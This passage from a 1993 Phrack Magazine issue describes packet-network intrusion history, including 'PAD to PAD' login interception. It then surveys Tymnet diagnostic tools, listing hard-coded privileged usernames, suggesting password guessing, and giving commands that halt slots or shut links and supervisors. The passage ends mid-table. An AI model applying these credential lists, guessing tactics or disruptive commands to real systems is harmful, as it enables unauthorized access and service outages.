Allowing a user access to NETVAL will allow the user to display all usernames active on the network and the corresponding host addresses. OTHER PROBLEMS EXAMPLE ONE On many networks users have the ability to connect to the packet assembler/disassembler (PAD) of the network dial-ups. This has led to significant problems in the past. In the mid-1980's two American hackers were exploring the German packet network DATEX-P. One connected to a host in Berlin and was immediately disconnected by the remote site. Before the hacker could react, the German host connected to the NUA corresponding to his Sprintnet PAD and sent him a login prompt. This alarmed the hacker greatly, as he assumed that the proprietors of the German host had somehow noticed his attempt to access their system. He contacted his partner and told him of the occurrence. The two concluded that since the NUA of the origination point is sent in the packet-header, the remote site must have been programed to recognize the NUA and then return the call. The fact that it had returned a call to a public PAD was intriguing to the pair, so they decided to attempt to recreate the event by calling each other. Both individuals connected to the network and one entered the NUA corresponding to the others PAD. A connection resulted and the two were able to interact with one another. They then decided that they would periodically meet in this fashion and discuss their findings from Germany. At the time of the next meeting, the connection did not occur as planned. One hacker quickly received a telephone call from the second who exclaimed rather excitedly that he had attempted to connect to his partner as planned, but accidentally connected to another PAD and intercepted a legitimate user typing his NUI. Further investigation proved that one could connect to public PADs during the idle period when the user was in network mode, prior to making a connection to a remote site. This discovery was intended to remain secret, because of its extremely dangerous applications. Nevertheless, word of this discovery soon reached the entire hacker community and what came to be known as "PAD to PAD" was born. The "PAD to PAD" technique became so wide-spread that hackers were soon writing software to intercept data and emulate hosts and capture login names and passwords from unsuspecting network users. Hackers were intercepting thousands of calls every day from users connecting to systems ranging from banking and credit to the Fortune 500 to government sites. After nearly two years of "PAD to PAD" Sprintnet became alerted to the crisis and disallowed all connections to public PADs. When Sprintnet expanded its service overseas they once again left access to the overseas PADs unrestricted. The problem went unnoticed again until their attention was brought to it by a hacker who called Sprintnet security and told them that they ought to fix it quickly before it became as wide-spread as before. The problem was resolved much quicker this time. This particular technique was not limited to Sprintnet. All networks using the Telenet software are at risk to this type of manipulation. This type of network manipulation was integral in the recent compromise of a large Bell Company's packet network in a much-publicized case. Certain foreign networks in countries such as Israel, England, Chile, Panama, Peru and Brazil are also at risk. EXAMPLE TWO In the late 1980's hackers stumbled onto a packet network owned and maintained by a large facilities maintenance company. This particular network had a huge flaw in its setup. It connected all calls placed through it as if they were placed with an NUI. This allowed hackers to place calls to addresses that refused collect connections on networks around the world. This became a popular method for hackers to access underground chat systems in Europe. Additionally, this network contained a score of computers belonging to a major automobile manufacturer. Most of these systems were highly insecure. The network also allowed unrestricted access to network debug ports. This particular network also had a toll-free number on an MCI exchange. At the time, MCI was having some difficulty getting their equipment to accept the ANI information to provide customers with a full call- detail report on their monthly statement. The hackers were well aware of this fact and made frequent use of the network with no fear of prosecution. Eventually MCI was able to fix their translation problem and were able to provide their clients with full call-detail reports. When this was learned, many hackers abandoned use of the network, but several others were later prosecuted for its usage when their number turned up on the bill. EXAMPLE THREE Until quite recently intimate knowledge of the utilities driving various packet-switched networks were known by an exclusive few. While investigating a network owned by an extremely large Cleveland-based conglomerate hackers came across a system where documentation on the usage of every utility was kept online. The hackers quickly downloaded all the information and it soon became somewhat wide-spread among the underground community. With less-skilled and more unscrupulous individuals in possession of this information many networks began experiencing disruptions and system integrity was quickly lost as hackers began monitoring data traffic. No information on the usage of packet networks or their utilities should ever be kept online. Hard copies should be kept in the possession of the network administrator, and when updated, obsolete versions must be destroyed. WHAT TO DO When a security violation stemming from a connection through the packet network is noticed, Network Security should be notified. Clients of BT-Tymnet should notify Steve Matthews at 408-922-7384. Clients of Sprintnet should notify Pat Sisson at 703-689-6913. Once changes have been enacted in the network to prevent further break-ins, the host computer should be checked thoroughly for any changes or damages, and all individual account passwords should be changed. CONCLUSION It is critical that the packet network be configured properly and that all measures are taken to ensure its security. Even the most secure host computer can be easily compromised if it is connected to an insecure packet network. ---------------------------------------------------------------------- ==Phrack Magazine== Volume Four, Issue Forty-Two, File 5 of 14 = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - Synopsis of Tymnet's Diagnostic Tools and their associated License Levels and Hard-Coded Usernames by Professor Falken February 14, 1993 = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - While the scope of this article is general, the information contained within is NOT for the novice Tymnet explorer. Novice or NOT, go ahead and read; however, caution should be taken when invoking any of these commands upon BT's network. Execution of certain commands can have debilitating consequences upon segments of the network. In this article I intend to educate the reader about the various Tymnet diagnostic utilities that are available. This article is by no means an in depth microscopic view of the utilities; but rather a brief to the point survey course of what is available to qualified people. With each utility I will describe its use/s, list its major commands, and in DDT & XRAY's case, dispense its hard-coded usernames which allow you to become a 'qualified person.' It seems the software engineers at Tymnet (for the lack of something better to do) like to rename ordinary words to complicated ones. For instance, within this article I will talk about LICENSE LEVELS. License levels are nothing more than security levels. When I speak of License Level 4, just translate that to Security Level 4. I would have just called everything security levels, but I wanted to stay within that lethargic Tymnet mood for realism purposes. Another word the engineers pirated from 'GI JOE' was GOOD-GUYS. In our world, a Good-Guy is a valid username that can be used for logging into the various diagnostic utilities. Like most conventional computers, Tymnet also needs an operating system for its code to run under. Tymnet's node-level, *multitasking*, operating system is called ISIS; it stands for 'Internally Switched Interface System.' Its designed for: handling multiple communication links, allocating system memory, system job/process scheduling, and all the other BASIC things ALL operating systems do. Tymnet explains it a bit more complicated and less to the point, but to give equal time to the opposing viewpoint, this is what they say: "Internally Switched Interface System. The operating system for a TYMNET node; provides functions that control the overall operation of an Engine. These functions include, but are not limited to, memory allocation, message switching, job scheduling, interrupt processing, and I/O distribution. ISIS allows multiple data communications functions to run on a single processor. Two of its many services are debugging and I/O port management. Formerly known as ISIS-II or ISIS2. ISIS2, ISIS-II Obsolete terms. See Internally Switched Interface System (ISIS)." At various points within this file I will refer to an ENGINE. Basically, an ENGINE is a minicomputer which handles all the processing requirements that ISIS and its applications demand. However, to be fair to all the Tymnet technoids, this is what BT says: "BT North America packet-handling hardware. The Engine communications processor is a member of a family of special-purpose minicomputers. It runs communications software such as Node Code (for switching), slot code (for protocol conversion and value-added functions), and the ISIS operating system. The Engine family consists of the Pico-Engine, Micro-Engine, Mini-Engine, Mini-Engine-XL, Dual-Mini-Engine-XL, Engine, and ATC." You think they would have invented much NEATER names for their computer platforms than 'Mini-Engine' or 'Micro-Engine'. I would guess that BT's hardware engineers have less time than the software engineers to invent K-RAD names for their projects. Anyhow, as you can see, the ENGINE is the muscle behind Tymnet's network brawn. Another term which is very basic to ANY understanding of Tymnet is the 'SUPERVISOR.' As you can see the engineers searched high & low for this clever term. The Supervisor is many things including, the authentication kernel you interact with, the circuit billing system that subscribers unfortunately do not interact with, and generally the network's 'BIG BROTHER.' Supervisor watches the status of the network at all times, keeping detailed logs and interceding when trouble erupts. The supervisor term can also refer to the engine upon which the Supervisor is being run on. With all that in mind, I will now introduce five of Tymnet's diagnostic tools. I intend on presenting them in this order: DDT, MUX, PROBE, LOAD-II, TOM, and XRAY. Please note that only DDT and XRAY have 'good-guy' lists provided. DDT - Dynamic Debugging Tool ---------------------------- DDT is a utility which runs under the ISIS operating system. DDT is capable of loading or displaying a slot's content. A slot is an area of memory in a node in which Tymnet applications run. DDT can also be used for modification of a specific slot's slot code. Slot code is any program which has been assigned memory within the engine by ISIS. DDT also performs other lower level diagnostic functions, which I will not go into. Logging into DDT requires you to provide the 'please log in:' prompt a valid username and password. Upon checking the good-guy list and authenticating the user, the kernel process searches for the associated slot assignment. If no slot is assigned to the good-guy, the kernel will prompt you for a slot number. Once you enter a VALID slot number and it is available, the authentication kernel executes the DDT utility. When I say 'VALID' slot number, I mean a slot number which logically exists AND is attainable by your current good-guy's license level. Actual logins to DDT take the form: please log in: goodguyID:host# password: Where goodguyID is a valid goodguy, host# is the Tymnet subscriber who needs a little 'work' done, and obviously the password is what it is. While I would like to give you all the passwords I could, I don't think it is going to happen. So all I can do is suggest trying different variations of the goodguy IDs, and other dumb passwords unsecure people use. Connection to primary DDT is displayed as the ever-so-friendly '*' prompt. It is from this prompt that all general DDT commands are directed. The most useful DDT commands are listed below in a general, extended, and RJE/3270T specific registry. GENERAL DDT COMMANDS -------------------- E Execute a slot. H Halt a slot. <---- DESTRUCTIVE See WARNING! ZZ Logs you out of DDT. ^# Transfers control from the current slot to the slot specified by #. (IE- ^7 Switches control to slot 7) ?CPU Displays CPU utilization (Engine Performance) ?HIST Displays a history of diagnostic messages. ?HOST Displays the hosts in use by that slot. ?LU Displays the logical unit to physical device assignment. ?MEM Displays the time of memory errors if any. ?STAT Allows the execution of EXTENDED DDT. To obtain the extended command prompt type '/'.Command prompt ':>' ?VERN Displays the ISIS version followed by the SLOT's version. WARNING!: It is possible to HALT a slot accidently. This will freeze everything going in/out of the current slot. This can be BAD for customer satisfaction reasons. If you accidently hit 'H', even without a CR/LF it will hang the slot. So when the ?HIST or ?HOST commands are used make SURE you type that important '?' beforehand. This will halt everything going over that slot, effectively destroying the communication link. EXTENDED COMMANDS FOR RJE & 3270T --------------------------------- RJE & 3270T =========== EXI Logs you out. (DuH!) QUIT Return from extended DDT prompt ':>' to normal '*' DDT prompt. RJE Only ======== HELP Displays a list of commands available in extended RJE DDT mode. (A list not worth putting in here.) SCOPE Outputs a protocol trace. TRACE Outputs a state trace. 3270T Only ========== HELP Displays a list of commands available in extended 3270T DDT mode. (Again, a list not worth putting in here.) STATUS Displays status of all lines, control units, and devices. STRTLN x Start polling on line x. (Performance benchmark) STRTCU x,y Start polling control UNIT x on LINE y. (Performance benchmark) STOPLN x Stop polling on line 'x' STOPCU x,y Stop polling control UNIT x on LINE y. NOTE:If you try to use an RJE command while logged into a 3270T you will be shown the incredible "ILLEGAL COMMAND" string. GOOD-GUYS AND LICENSE LEVELS ---------------------------- As with any username, there is an accompanying license level (security level) with each account. The different levels define which types of slots that username may access and the available commands. Some of the good-guys have access to all slots including supervisor, while others have access to only non-supervisor slots. The table below is a list of the actions that are available with the various different license levels. L.DISC Permits disk formatting L.H Permits the halting, loading, and restarting of all slots for code-loading purposes. L.P Permits the halting, restarting, and online software modification to an active slot. (Except slots 0 and FF) L.R Permits logon to all slots (Except 0 and FF) L.SOA Permits logon to a node's slot 0. (Node configuration.) L.SOP Permits the halting, restarting, and online software modification to slot 0. L.SOR Permits the reading of slot 0 files. L.SUA Permits logon to Supervisor slots. L.SYA Permits logon to a node's FF slot. (ISIS configuration node.) L.SYR Permits the reading of slot FF files. L.SYP Permits the halting, restarting, and online modification to slot FF. The DDT license levels are numbered from 0 to 4, 4 being Gh0D. Each level has several of the above named actions available to them. Listed below are the various actions available at the 0 through 4 license levels. LEVEL ACTIONS ===== ======= 4 L.DISC, L.P, L.SOA, L.SOP, L.SUA, L.SYA, and L.SYP . (Disk format, halt, restart, online software mods, and reading of files for all slots AND supervisors. Like I said, GOD.) 3 L.P, L.SOA, L.SOP, L.SYA, and L.SYP . (Halt, restart, online software mods, and reading of files for all slots and supervisors.) 2 L.H, L.R, L.SOA, L.SOR (For code loading purposes: halt, restart online software mods, and reading files for all slots and supervisor nodes.) 1 L.R, L.SOA, L.SYA (Views ALL slots and supervisor nodes) 0 L.R (Views all slots, EXCEPT supervisor slots and 0 & FF.) What follows is a good-guy userlist with the associated license level of that username. I also note whether the account is ACTIVE/PASSIVE upon an operating node/slot combination and the seriousness of the network impact that those associated licenses can possibly create. LICENSE LEVEL GOOD GUY USERNAME ACTIVE/PASSIVE NETWORK IMPACT ============= ================= ============== ============== 4 ISISTECH Active MAJOR 4 NGROM Active MAJOR 4 NSSC Active MAJOR 4 RPROBE Active MAJOR 4 RERLOG Active MAJOR 4 RACCOUNT Active MAJOR 4 RSYSMSG Active MAJOR 4 RUN2 Active MAJOR 4 TNSCM Active MAJOR 3 IEXP Active Moderate 3 ISERV1 Active Moderate 3 ISERV2 Active Moderate 3 ISERV3 Active Moderate 3 ITECH1 Active Moderate 3 ITECH2 Active Moderate 3 ITECH3 Active Moderate 3 ITECH4 Active Moderate 3 ITECH5 Active Moderate 2 GATEWAY Active Minor 1 DDT Passive 1 DDTECH Passive 1 IOPPS Passive 1 ISERV Passive 1 ITECH Passive 0 VADICBUSY Passive MUX - The Circuit Multiplexer ----------------------------- MUX is a tool which also runs within an ISIS slot. MUX allows the building, interconnecting, and controlling of several sets of circuits from a single terminal. Instead of logging in and out of each diagnostic tool as different commands are needed, MUX is used to create multiple concurrent circuits. Once these are set up, it is easy to switch back and forth between different diagnostic applications, WITHOUT having to logoff one before logging into another. Tymnet also likes to boast that you can chat with other users on MUX's 'Talk mode facility.' I'll stick to IRC until this catches on. Logging into MUX is quite simple. It takes the form of: please log in: userid password: NOTE: ATTN commands, see CHAR command. ATTN ATTN Allows you to send one attention character down the circuit. ATTN C x Labels the current port, where 'x' is the label you desire. ATTN E Allows you to switch to the next port you have defined. This command however is not valid from the command mode. The circuit label is presented and connection is made. Even though the prompt for that circuit is not presented, you ARE connected. ATTN Z Returns you to the command mode. CHAR char Configures your ATTN character to 'char'. So in the below ATTN commands, you will have to enter your ATTN character then the proceeding character. The default ATTN Character is CTRL-B. Personally, I like to set mine to '!'. CONNECT pl1,pl2 Connect the output of port label-1 to port label-2. Usually your current port label is marked with a * preceding it in a 'LIST', this is also known as a BOSS. ENABLE pl Enables a pl's (port labels) output. EXIT Leave MUX with all your circuits INTACT. FLUSH pl Flush pl's (port labels) output. FREEZE N/F Freeze (N=ON or F=OFF) current Boss. GREETING msg Sets up the greeting message. HEAR N/F Allow (N=ON or F=OFF) users to 'TALK' to each other. HELP Prints help messages. (ooof) LIST Lists all active ports for the current user. (ATTN Z L) LABEL N/F Labeling (N=ON or F=OFF) of all output sent to the Boss. MAKE Make a new circuit by logging onto a diagnostic tool. You will be prompted with the omnipresent 'Please log in:' prompt. Just login as usual for particular tool. MESSAGE Print last message. QUIT Leave MUX and ZAP all circuits created. SEND pl Send to pl (port label). TALK username Talks to 'username' providing HEAR=N. TIME Outputs date and time in format: 31Dec93 05:24 TRANSFER pl Transfers control of this BOSS to pl (port label). ZAP pl Zap any circuits you made, where 'pl' is the port label. This command defaults to the port labeled '*' (Boss). This command is ONLY valid in command mode. PROBE ----- PROBE is probably one of the BEST known Tymnet diagnostic tools. PROBE is actually a sub-program of the Supervisor. PROBE is capable of monitoring the network, and it has access to current pictures of network topology, including host tables and node descriptors. PROBE shares common memory with the Supervisor and has circuit tracing capability. PROBE can be used to check the history of nodes & links, boot a node, trace a circuit, and reset a link or shut one down. PROBE can be access directly or through TMCS (Tymnet Monitoring and Control System.) To access PROBE from within TMCS you would enter the command: PROBE s Where 's' is the active or 'sleeping' supervisor. For more PROBE related TMCS commands or general TMCS commands, please refer to an appropriate source. If the demand is great enough, perhaps I will release a TMCS reference sheet in the future. PROBE access is determined by the sum of the individual license levels granted to the user. PROBE licenses are as follows: License Description ------- ----------- 00 Permits view only commands -- user is automatically logged off from PROBE after 20 minutes of no activity. 04 Permits view only commands -- no automatic logoff. 20 Permits all 00 commands plus ability to effect changes to network links. 10 Permits ability to effect changes to node status. 01 Permits ability to effect changes to network supervisors. 02 Permits ability to effect changes to supervisor disks. I do not have any hardcoded usernames for PROBE with this exception. The PROBE access username 'PROBE' is hardcoded into the supervisor, and usually each host has one hardcoded PROBE username: CONTROL -- license level 37. So in comparison with the above chart, CONTROL has Gh0d access to PROBE commands, because everything added up equals 37 (duh). On many subnets, the username RPROBE has similar access. PROBE COMMANDS Command Lic. Lvl Description ------- -------- ----------- CHANGE 00/04 Changes your PROBE personal password. EXI 00/04 Logout. HELP 00/04 Help. (Temple of Sub-Genius) SEND x text 00/04 Sends message to Probe user whose job label is 'x'. VERSION 00/04 Lists current software version number. WHO 00/04 Lists currently logged in PROBE users. (Useful) DISPLAY CMDS: Command Lic. Lvl Description ------- -------- ----------- ACCT 00/04 Displays # of accounting blocks on Supervisor disk available for RAM session record data. AN 00/04 Displays detailed information about active nodes. ASTAT 00/04 Displays number of login and circuit building timeouts. AU 00/04 Displays node numbers of ALL active nodes that are up. CHAN x 00/04 Displays port number used by Supervisor for command circuit to node 'x'. COST x 00/04 Displays cost of building command circuit to node 'x'. CSTAT 00/04 Displays time, login, rate, and network status every 15 seconds. EXC O|S|P 00/04 Displays links that are overloaded (O), or shut (S), or out of passthroughs (P). HOST x 00/04 Displays information about host 'x' or all hosts. LACCT 00/04 Displays number of last accounting block collected by RAM session record data. LRATE 00/04 Displays Supervisor login rate in logins per min. LSHUT 00/04 Displays shut links table. LSTMIN 00/04 Displays circuit status information gathered by Supervisor during preceding minute. N x 00/04 Displays status info about node 'x'. OV x 00/04 Displays overloaded links. PERDAT 00/04 Displays Supervisor performance data for preceding min. RTIME 00/04 Reads 'Super Clock' time and displays year, and Julian date/time. STAT 00/04 Displays network status information. SYS 00/04 Displays host number running PROBE. TIME 00/04 Displays Julian date and network time. TSTAT 00/04 Displays same information as STAT, preceded by Julian date/time. VERSION 00/04 Displays current versions of PROBE and Supervisor software. WHO 00/04 Displays active PROBE users and their job labels. LOG MESSAGE CMDS: Command Lic. Lvl Description ------- -------- ----------- LOG 00/04 Outputs network information from Supervisor log. REPORT 00/04 Controls output of node reports. RLOG m1..m4 00/04 Restricts log output to up to four message numbers. M1- 1st Message, M2- 2nd Message, etc. RNODE n1 n2 00/04 Restricts log output to messages generated at nodes N1 and N2. NETWORK LINK CMDS: Command Lic. Lvl Description ------- -------- ----------- CSTREQ n1 n2 20 Requests total speed of all lines on specified link. (n1= 1st Node n2= 2nd Node) ESHUT n1 n2 20 Shuts specified link and enters it on shut links table. (n1= 1st Node n2= 2nd Node) PSTAT n Hhost p 20 For node 'n', displays status of logical ports for port array 'p' on 'host'. Note the capital 'H' must precede the host specific. RSHUT n1 n2 20 Opens specified link and removes it from shut links table. SYNPRT n 20 Displays status of async ports on node 'n'. TRACE n Hhost p 20 Traces specified circuit. Where 'n' is node, or n Sp 20 'host' is HOST, and 'p' is port. Or for secondary command: 'n' node name, 'p' port. Again, 'S' must precede the port name. T2BORI n1 n2 20 Resets communication channel between node n1 and node n2. NETWORK NODE CMDS: Command Lic. Lvl Description ------- -------- ----------- CLEAR n 10 Opens all links on node 'n'. DLOAD n 10 Causes node 'n' to execute its downline load bootstrap program. NSHUT n 10 Shuts all links on node 'n'. RETAKE n 10 Causes Supervisor to release and retake control of node 'n'. SPY 10 Displays last 32 executions of selected commands. NETWORK SUPERVISOR CMDS: Command Lic. Lvl Description ------- -------- ----------- AWAKE 01 Wakes a sleeping Supervisor. (Only one Supervisor is active at one time, however there can be supervisors 'sleeping'.) CLASS 01 Causes Supervisor to read Netval class and group definitions. DF s 01 Increases Supervisor's drowsiness factor by 's' seconds. ETIME 01 Sets time known to Supervisor. FREEZE 01 Removes Supervisor from network. PSWD 01 Displays password cipher in hex. SLEEP 01 Puts active Supervisor to sleep. THAW 01 Initializing frozen Supervisor. TWAKE 01 Wakes sleeping Supervisor, automatically puts active Supervisor to sleep and executes a CSTAT command. USER UTILITY CMDS: Command Lic. Lvl Description ------- -------- ----------- ENTER 01 Adds/deletes/modifies Probe usernames. HANG x 01 Logs off user with job label 'x'. LIST 01 Displays Probe usernames. ULOGA 20 Enters user-generated alphabetic message in msg log. ULOGH 20 Enters user-gener